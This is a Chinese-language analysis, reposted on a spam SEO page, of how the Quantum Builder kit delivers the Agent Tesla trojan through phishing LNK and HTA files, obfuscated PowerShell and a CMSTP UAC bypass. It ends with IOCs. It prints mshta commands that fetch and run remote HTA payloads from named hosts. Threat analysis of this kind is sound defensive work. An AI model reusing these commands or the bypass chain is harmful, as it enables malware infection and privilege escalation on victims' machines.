中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁(yè) > news >正文

網(wǎng)站建設(shè) 外包南寧百度快速排名優(yōu)化

網(wǎng)站建設(shè) 外包,南寧百度快速排名優(yōu)化,網(wǎng)站建設(shè)需要哪些素材,廣州品牌建站廣州品牌建站Zscaler 的研究人員發(fā)現(xiàn)暗網(wǎng)上正在出售名為 Quantum Builder 的構(gòu)建工具,該工具可以投遞 .NET 遠(yuǎn)控木馬 Agent Tesla。與過(guò)去的攻擊行動(dòng)相比,本次攻擊轉(zhuǎn)向使用 LNK 文件。 Quantum Builder 能夠創(chuàng)建惡意文件,如 LNK、HTA 與 PowerShell&…

Zscaler 的研究人員發(fā)現(xiàn)暗網(wǎng)上正在出售名為 Quantum Builder 的構(gòu)建工具,該工具可以投遞 .NET 遠(yuǎn)控木馬 Agent
Tesla。與過(guò)去的攻擊行動(dòng)相比,本次攻擊轉(zhuǎn)向使用 LNK 文件。

Quantum Builder 能夠創(chuàng)建惡意文件,如 LNK、HTA 與 PowerShell,最后投遞 Agent Tesla。攻擊者使用復(fù)雜的技術(shù)來(lái)生成
Payload:

使用 CMSTP 繞過(guò)用戶賬戶控制,以便以管理權(quán)限執(zhí)行最終 Payload 并關(guān)閉 Windows Defender

利用集成了無(wú)文件攻擊等多種攻擊向量的多階段感染鏈

在內(nèi)存中執(zhí)行 PowerShell 腳本以進(jìn)行逃避檢測(cè)

打開(kāi)誘餌分散受害者的注意力

后文對(duì)感染鏈進(jìn)行了深入分析,并對(duì) Quantum Builder 生成的 Payload 進(jìn)行了比較。

感染鏈

感染鏈?zhǔn)加隰~(yú)叉郵件,其中包含一個(gè)攜帶 GZIP 文檔的 LNK 文件。執(zhí)行 LNK 文件后,嵌入的 PowerShell 代碼會(huì)生成 MSHTA
來(lái)執(zhí)行遠(yuǎn)程服務(wù)器上的 HTA 文件。

image.png-133.1kB感染鏈

HTA 文件解密 PowerShell 腳本,在執(zhí)行 AES 解密和 GZIP 解壓縮后解密并加載另一個(gè) PowerShell 腳本。解密后的
PowerShell 腳本是一個(gè) Downloader,通過(guò)遠(yuǎn)程服務(wù)器下載 Agent Tesla,再使用 CMSTP 繞過(guò) UAC 以管理權(quán)限執(zhí)行。

技術(shù)分析

魚(yú)叉郵件的主題為訂單確認(rèn),如下所示:

image.png-284.5kB魚(yú)叉郵件

郵件帶有一個(gè) GZIP 文件作為附件,與帶有 PDF 圖標(biāo)的惡意 LNK 文件捆綁在一起。執(zhí)行后 LNK 文件會(huì)運(yùn)行混淆的 PowerShell 代碼,經(jīng)過(guò)
base64 解編碼與異或解密得到執(zhí)行命令 IEX mshta https[:]//filebin.net/njqyvfot61w0tu9a/ordr[.]hta。

image.png-181.9kB執(zhí)行混淆代碼

image.png-95.2kB通過(guò)
MSHTA 執(zhí)行遠(yuǎn)程服務(wù)器上的 HTA 文件

HTA 文件包含多個(gè)千余行的垃圾 VBS 函數(shù),其中只有一個(gè)與惡意行為有關(guān)。

image.png-87.5kBHTA
主要函數(shù)

解密出來(lái)的 PowerShell 腳本如下所示:

image.png-229.6kB解密
PowerShell 代碼

解密完成后,惡意函數(shù)就會(huì)通過(guò) CreateObject() 創(chuàng)建一個(gè) Wscript.Shell 對(duì)象,然后通過(guò) Run 方法執(zhí)行解密后的
PowerShell 腳本。

image.png-249.5kBPowerShell
代碼執(zhí)行

解密的代碼以隱藏窗口的形式執(zhí)行,解密后會(huì)獲取另一個(gè) PowerShell 代碼。

image.png-377.6kB執(zhí)行新的
PowerShell 代碼

IEX 函數(shù)執(zhí)行 AES 解密與 GZIP 解壓是關(guān)鍵的 PowerShell 代碼:

從遠(yuǎn)程服務(wù)器下載 Agent Tesla 的 Payload

執(zhí)行 CMSTP 繞過(guò) UAC

通過(guò)操作文件屬性隱藏 Agent Tesla

Agent Tesla 被硬編碼命名為 MuUQDuaFNoGmHQE.exe,并且被最終執(zhí)行:

image.png-118.9kB解密
PowerShell 代碼

解密可獲取 Agent Tesla 的部署地址:

image.png-70.9kBURL
解密

image.png-126.3kB下載
Agent Tesla

通過(guò) WriteAllBytes() 函數(shù)寫(xiě)入磁盤(pán),路徑為
C:\Users\<username>\AppData\Roaming\MuUQDuaFNoGmHQE.exe

image.png-48.2kB寫(xiě)入指定位置

Agent Tesla 二進(jìn)制文件的路徑作為參數(shù)傳遞給 PowerShell 腳本中的 CMSTP UAC Bypass
函數(shù)。該函數(shù)最初解碼一個(gè)特別大的、base64 編碼的數(shù)據(jù)塊,如下所示:

image.png-692.3kBCMSTP
UAC Bypass

解碼后的代碼是基于 PowerShell 的 CMSTP UAC Bypass PoC,在
[GitHub](https://github.com/tylerapplebaum/CMSTP-
UACBypass/blob/master/UACBypassCMSTP.ps1)上也能夠找到?;?PowerShell 的 CMSTP UAC 繞過(guò)
PoC 腳本在執(zhí)行時(shí)會(huì)在 Temp 目錄中寫(xiě)入惡意 INF 文件,其中 PowerShell 腳本中的 $CommandToExecute變量是
Agent Tesla 二進(jìn)制文件的路徑。

image.png-265.3kB惡意
INF 文件

將 INF 文件寫(xiě)入臨時(shí)目錄后,PowerShell 代碼會(huì)生成一個(gè)新進(jìn)程 cmstp.exe,并以 /au $InfFileLocation作為參數(shù),然后安裝惡意 INF 文件,如下所示:

image.png-31.8kB惡意
INF 文件作為參數(shù)執(zhí)行 CMSTP

在 cmstp.exe 安裝 INF 文件時(shí),RunPreSetupCommandsSection 參數(shù)中的命令將以管理權(quán)限執(zhí)行。該腳本將 [ENTER]
按鍵發(fā)送到活動(dòng)的窗口應(yīng)用程序,以便使用 SendKeys.SendWait() 函數(shù)自動(dòng)執(zhí)行。

image.png-14.4kB觸發(fā)
UAC 繞過(guò)

當(dāng)以惡意 INF 作為參數(shù)生成 cmstp.exe 時(shí),就會(huì)以管理權(quán)限執(zhí)行惡意軟件,如下所示:

image.png-89.9kBUAC
繞過(guò)并以管理權(quán)限執(zhí)行

Agent Tesla 的 C&C 服務(wù)器被配置為:

image.png-10kB配置信息

C&C 通信如下所示:

image.png-174.6kBC&C
通信

PowerShell 代碼還通過(guò)操作隱藏文件屬性來(lái)隱藏 Agent Tesla 二進(jìn)制文件,如下所示:

image.png-74.1kB隱藏文件

攻擊變化

感染鏈的另一個(gè)變種,LNK 文件被捆綁在 ZIP 壓縮包中。通過(guò)命令 Iex mShta http://179[.]43[.]175[.]187/puao/PAYMENT.hta來(lái)執(zhí)行遠(yuǎn)程 HTA
文件。通過(guò)將整數(shù)轉(zhuǎn)換為字符然后替換空格并進(jìn)一步利用 MSHTA 從遠(yuǎn)程 URL 執(zhí)行 HTA 文件,如下所示。

image.png-507kB通過(guò)
LNK 執(zhí)行 HTA 文件

MSHTA 執(zhí)行的 HTA 文件與之前感染鏈中使用的文件相同,加密數(shù)組轉(zhuǎn)換為字符以形成可通過(guò) Run 方法執(zhí)行的 PowerShell 代碼。

image.png-255.8kBHTA
文件解密 PowerShell 代碼

除了 Run() 方法之外,在某些情況下,HTA 文件利用 ShellExecute() 方法執(zhí)行 PowerShell 代碼,如下所示:

image.png-366.1kB通過(guò)
ShellExecute() 執(zhí)行代碼

下載落地后,使用 Start-Process() 從 AppData 路徑執(zhí)行 Agent Tesla。如果 Payload 的擴(kuò)展名為
.dll,則它使用 rundll32.exe 將 DLL 加載到虛擬內(nèi)存中。

image.png-447.7kB通過(guò)解密的
PowerShell 代碼下載并執(zhí)行 Agent Tesla

在某些情況下,還會(huì)有在內(nèi)存中解密的 PowerShell 代碼。代碼使用 Invoke-Item
函數(shù)下載并執(zhí)行了一個(gè)誘餌文件,以此來(lái)分散受害者的注意力,如下所示:

image.png-228.5kB誘餌執(zhí)行

C&C 服務(wù)器的配置為:

image.png-10.3kB配置信息

C&C 通信如下所示:

image.png-235kBC&C
通信

Quantum

這些惡意文件都是由名為 Quantum Builder 的構(gòu)建工具創(chuàng)建的,如下所示:

image.png-257.1kBQuantum
Builder

HTA 生成工具

HTA 生成工具如下所示:

image.png-165.5kBHTA
生成工具

用戶輸入傳遞給 HTA Builder 函數(shù)以構(gòu)造 HTA 文件,如下所示:

image.png-439.4kBHTA
生成工具

將此代碼與之前分析的 HTA 代碼比較,可以確定 Payload 是由 Quantum Builder 生成的。

image.png-121.9kB在野
HTA 文件

LNK 生成工具

LNK 生成工具如下所示:

image.png-118.9kBLNK
生成工具

快捷方式的構(gòu)造參數(shù)有 Description、IconLocation、Target Path、Arguments 和 WindowStyle,如下所示:

image.png-365.1kBLNK
生成工具

將此代碼與之前分析的 LNK 代碼比較,可以確定 Payload 是由 Quantum Builder 生成的。

image.png-72.7kB在野
LNK 文件

LNK 構(gòu)建工具還可以生成 ISO 文件的 Payload,如下所示:

image.png-72.9kBISO
生成工具

Quantum Builder 已被攻擊者多次利用,部署了多個(gè)惡意軟件家族:

RedLine Stealer

IcedID

GuLoader

RemcosRAT and AsyncRAT

結(jié)論

攻擊者會(huì)不斷更新技術(shù)手段,利用各種惡意軟件進(jìn)行攻擊。本次使用的 Agent Tesla 是最新的,Quantum Builder
已經(jīng)被應(yīng)用在各種攻擊活動(dòng)中投遞各種惡意樣本。

IOC

3edfa0cf3b7d54c24013e4f0019dba20
bb914889d5edc6b56c666d2e44e1a437
1adc0bd494cd42578ac8c8e726d5ad92
31c341ad31224cc7d38a5c4e80ccb727
f931773a226809669cad91410a57267f
d9433faddcaca526b26f713e27e2505f
213ada506251c477480bd14ea5507bf3
0ebb9d422f8e86458d8fa7f66fe1d0f1
563fda5da81a5e7818d771222e81f6c4
filebin[.]net/njqyvfot61w0tu9a/ordr[.]hta
filebin[.]net/yiob7vjw7pqow03r/RFQ_270622[.]hta
179[.]43[.]175[.]187/puao/PAYMENT[.]hta
179[.]43[.]175[.]187/puao/PO-M6888722[.]hta
filebin[.]net/e730ez2etlh3weer/MuUQDuaFNoGmHQE[.]exe
179[.]43[.]175[.]187/puao/PAYMENTS[.]exe
179[.]43[.]175[.]187/puao/PO-M6888757[.]exe
mail[.]thesharpening.com[.]au
ftp[.]qurvegraphics[.]com

最后

對(duì)于從來(lái)沒(méi)有接觸過(guò)網(wǎng)絡(luò)安全的同學(xué),我們幫你準(zhǔn)備了詳細(xì)的學(xué)習(xí)成長(zhǎng)路線圖。可以說(shuō)是最科學(xué)最系統(tǒng)的學(xué)習(xí)路線,大家跟著這個(gè)大的方向?qū)W習(xí)準(zhǔn)沒(méi)問(wèn)題。

同時(shí)每個(gè)成長(zhǎng)路線對(duì)應(yīng)的板塊都有配套的視頻提供:


當(dāng)然除了有配套的視頻,同時(shí)也為大家整理了各種文檔和書(shū)籍資料&工具,并且已經(jīng)幫大家分好類了。

因篇幅有限,僅展示部分資料,有需要的小伙伴,可以【掃下方二維碼】免費(fèi)領(lǐng)取:

http://www.risenshineclean.com/news/1810.html

相關(guān)文章:

  • 南通市網(wǎng)站建設(shè)我的完廣州網(wǎng)絡(luò)營(yíng)銷推廣
  • 做銀行設(shè)計(jì)有好的網(wǎng)站參考嗎網(wǎng)站搭建需要多少錢
  • 溫州多語(yǔ)言網(wǎng)站建設(shè)網(wǎng)站發(fā)帖推廣平臺(tái)
  • 網(wǎng)頁(yè)瀏覽設(shè)置在哪里打開(kāi)網(wǎng)頁(yè)優(yōu)化
  • 做網(wǎng)站比較好的環(huán)球網(wǎng)疫情最新
  • 2015做哪個(gè)網(wǎng)站能致富沈陽(yáng)專業(yè)seo關(guān)鍵詞優(yōu)化
  • 建設(shè)公司企業(yè)網(wǎng)站個(gè)人網(wǎng)頁(yè)怎么制作
  • WordPress網(wǎng)頁(yè)加載時(shí)間seo網(wǎng)站優(yōu)化快速排名軟件
  • 備案名 網(wǎng)站名互聯(lián)網(wǎng)營(yíng)銷師教材
  • 有幾個(gè)網(wǎng)站能在百度做推廣怎么弄推廣廣告
  • 手機(jī)門戶網(wǎng)站百度推廣賬戶登錄首頁(yè)
  • 城鄉(xiāng)與建設(shè)部網(wǎng)站首頁(yè)seo工具不包括
  • 購(gòu)物網(wǎng)站英語(yǔ)濟(jì)南做seo的公司排名
  • wordpress鏈接亞馬遜在線優(yōu)化工具
  • 云南省網(wǎng)站備案要求網(wǎng)絡(luò)推廣企劃
  • 長(zhǎng)沙市住建委和城鄉(xiāng)建設(shè)網(wǎng)站長(zhǎng)沙網(wǎng)絡(luò)公司排名
  • WordPress圖片置頂寧波seo在線優(yōu)化
  • 友點(diǎn)企業(yè)網(wǎng)站管理系統(tǒng)模板下載百度如何優(yōu)化排名靠前
  • 搜索的網(wǎng)站后大拇指分享數(shù)量不見(jiàn)了收錄批量查詢工具
  • 2017年網(wǎng)站設(shè)計(jì)磁力貓引擎
  • 上海專業(yè)做網(wǎng)站公司電話注冊(cè)域名費(fèi)用一般多少錢
  • 手機(jī)怎么制作釣魚(yú)網(wǎng)站網(wǎng)絡(luò)營(yíng)銷組織的概念
  • 大公司做網(wǎng)站seo分析
  • 用什么做視頻網(wǎng)站比較好個(gè)人在百度上發(fā)廣告怎么發(fā)
  • 大型門戶網(wǎng)站建設(shè)包括哪些方面seoapp推廣
  • 上海網(wǎng)站建設(shè)推薦今日新聞?lì)^條最新消息
  • 注冊(cè)了域名怎么做網(wǎng)站成全在線觀看免費(fèi)高清動(dòng)漫
  • 做炫舞情侶頭像動(dòng)態(tài)圖網(wǎng)站推廣是什么意思
  • 國(guó)外做節(jié)目包裝的網(wǎng)站網(wǎng)上做推廣怎么收費(fèi)
  • 2015年做啥網(wǎng)站能致富廣告推廣一個(gè)月多少錢